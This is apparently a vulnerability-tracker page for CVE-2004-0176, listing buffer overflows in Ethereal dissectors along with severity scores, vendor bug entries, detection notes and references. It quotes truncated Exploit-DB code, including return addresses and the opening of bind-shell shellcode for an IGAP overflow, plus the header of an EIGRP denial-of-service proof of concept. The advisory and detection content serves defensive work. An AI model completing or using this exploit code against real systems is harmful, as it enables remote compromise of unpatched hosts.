CVE-2004-0176
published 2004-05-04CVE-2004-0176: Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1)…
PriorityP343medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
67.09%
99.2th percentile
Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
| ethereal_group | ethereal | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x39
- →Detect oversized IGAP packets with igap_msgsize field exceeding 0x40 (64 bytes) — the exploit sets igap_msgsize=0x40+PAYLOAD_SIZE to overflow the dissector buffer. ↗
- →Detect EIGRP IP Internal Routes TLV (type 0x0102) with a Length field of 0x0039 (57) where the correct value should be 0x001C (28) — this triggers the TLV_IP_INT overflow. ↗
- →Monitor for raw socket (SOCK_RAW/IPPROTO_RAW) traffic carrying IGMP/IGAP (protocol 0x02) packets with payload sizes significantly exceeding the standard IGAP message structure (16+64 bytes). ↗
- →After successful exploitation, watch for a bind shell on port 31337 spawned by the shellcode embedded in the IGAP exploit payload. ↗
- ·The IGAP exploit requires root privileges on the attacking machine to open a raw socket (SOCK_RAW). ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rfxc-wgf7-qphr: Multiple buffer overflows in Ethereal 0
ghsa_unreviewed·2022-04-29
CVE-2004-0176 [MEDIUM] GHSA-rfxc-wgf7-qphr: Multiple buffer overflows in Ethereal 0
Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.
Red Hat
security flaw
vendor_redhat·2004-03-04·CVSS 5.0
CVE-2004-0176 [MEDIUM] security flaw
security flaw
Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.
No detection rules found.
Exploit-DB
Ethereal 0.10.0 < 0.10.2 - IGAP Overflow
exploitdb·2004-03-28
CVE-2004-0176 Ethereal 0.10.0 < 0.10.2 - IGAP Overflow
Ethereal 0.10.0
#include
#include
#include
#include
#include
#include
#define MAX_ARCH 5
struct eos{
char *arch;
unsigned long ret;
} targets[] = {
"tEthereal(0.10.2)-Gentoo(gdb)",
0xbffede50,
//-------------------------------
"tEthereal(0.10.2)-Gentoo ",
0xbffede10,
//-------------------------------
"Ethereal(0.10.2)-Gentoo ",
0xbfffd560,
//-------------------------------
"tEthereal(0.10.2)-RedHat 8 ",
0xbffedfb8,
//-------------------------------
"Ethereal(0.10.2)-RedHat 8 ",
0xbfffcd08,
//-------------------------------
NULL,
0
};
/*
x86 linux portbind a shell in port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/
char shellcode_firsthalf[]=
/* sys_fork() */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\xb0\x02" // movb $0x2,%al
"\
Exploit-DB
Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service
exploitdb·2004-03-26
CVE-2004-0176 Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service
Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service
---
/*
* Ethereal network protocol analyzer
* EIGRP Dissector TLV_IP_INT Long IP Address Overflow
* vulnerability
* proof of concept code
* version 1.0 (Mar 26 2004)
*
* by R�mi Denis-Courmont
* www simphalempin com dev
*
* This vulnerability was found by:
* Stefan Esser s.esser e-matters de
* whose original advisory may be fetched from:
* security e-matters de advisories 032004.html
*
* Vulnerable:
* - Ethereal v0.10.2
*
* Not vulnerable:
* - Ethreal v0.10.3
*
* Note: this code will simply trigger a denial of service on Ethereal.
* It should really be possible to exploit the buffer overflow
* (apparently up to 29 bytes overflow), but I haven't tried.
*/
#include
#include
#include
#include
#include
#include
#includ
Bugzilla
CVE-2004-0176 security flaw
bugzilla·2018-08-16·CVSS 5.0
CVE-2004-0176 [MEDIUM] CVE-2004-0176 security flaw
CVE-2004-0176 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.
Bugzilla
CAN-2004-0176 Ethereal dissector overflows
bugzilla·2004-03-12
[MEDIUM] CAN-2004-0176 Ethereal dissector overflows
CAN-2004-0176 Ethereal dissector overflows
Stefan Esser reported that Ethereal versions 0.10.1 and earlier
contain stack overflows in the IGRP, PGM, Metflow, ISUP, TCAP, or IGAP
dissectors. On a system where Ethereal is being run a remote attacker
could send malicious packets that could cause Ethereal to crash or
execute arbitrary code. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2004-0176 to this issue.
Treating as embargoed.
CAN-2004-0176 Affects: 2.1AS 2.1ES 2.1WS 2.1AW
CAN-2004-0176 Affects: 3AS 3ES 3WS
Discussion:
no longer embargoed
---
An errata has been issued which should help the problem described in this bug report.
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835http://marc.info/?l=bugtraq&m=108007072215742&w=2http://marc.info/?l=bugtraq&m=108058005324316&w=2http://marc.info/?l=bugtraq&m=108213710306260&w=2http://secunia.com/advisories/11185http://security.e-matters.de/advisories/032004.htmlhttp://security.gentoo.org/glsa/glsa-200403-07.xmlhttp://www.debian.org/security/2004/dsa-511http://www.ethereal.com/appnotes/enpa-sa-00013.htmlhttp://www.kb.cert.org/vuls/id/119876http://www.kb.cert.org/vuls/id/125156http://www.kb.cert.org/vuls/id/433596http://www.kb.cert.org/vuls/id/591820http://www.kb.cert.org/vuls/id/644886http://www.kb.cert.org/vuls/id/659140http://www.kb.cert.org/vuls/id/740188http://www.kb.cert.org/vuls/id/864884http://www.kb.cert.org/vuls/id/931588http://www.mandriva.com/security/advisories?name=MDKSA-2004:024http://www.osvdb.org/6893http://www.redhat.com/support/errata/RHSA-2004-136.htmlhttp://www.redhat.com/support/errata/RHSA-2004-137.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/15569https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10187https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A878https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A887http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835http://marc.info/?l=bugtraq&m=108007072215742&w=2http://marc.info/?l=bugtraq&m=108058005324316&w=2http://marc.info/?l=bugtraq&m=108213710306260&w=2http://secunia.com/advisories/11185http://security.e-matters.de/advisories/032004.htmlhttp://security.gentoo.org/glsa/glsa-200403-07.xmlhttp://www.debian.org/security/2004/dsa-511http://www.ethereal.com/appnotes/enpa-sa-00013.htmlhttp://www.kb.cert.org/vuls/id/119876http://www.kb.cert.org/vuls/id/125156http://www.kb.cert.org/vuls/id/433596http://www.kb.cert.org/vuls/id/591820http://www.kb.cert.org/vuls/id/644886http://www.kb.cert.org/vuls/id/659140http://www.kb.cert.org/vuls/id/740188http://www.kb.cert.org/vuls/id/864884http://www.kb.cert.org/vuls/id/931588http://www.mandriva.com/security/advisories?name=MDKSA-2004:024http://www.osvdb.org/6893http://www.redhat.com/support/errata/RHSA-2004-136.htmlhttp://www.redhat.com/support/errata/RHSA-2004-137.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/15569https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10187https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A878https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A887
2004-05-04
Published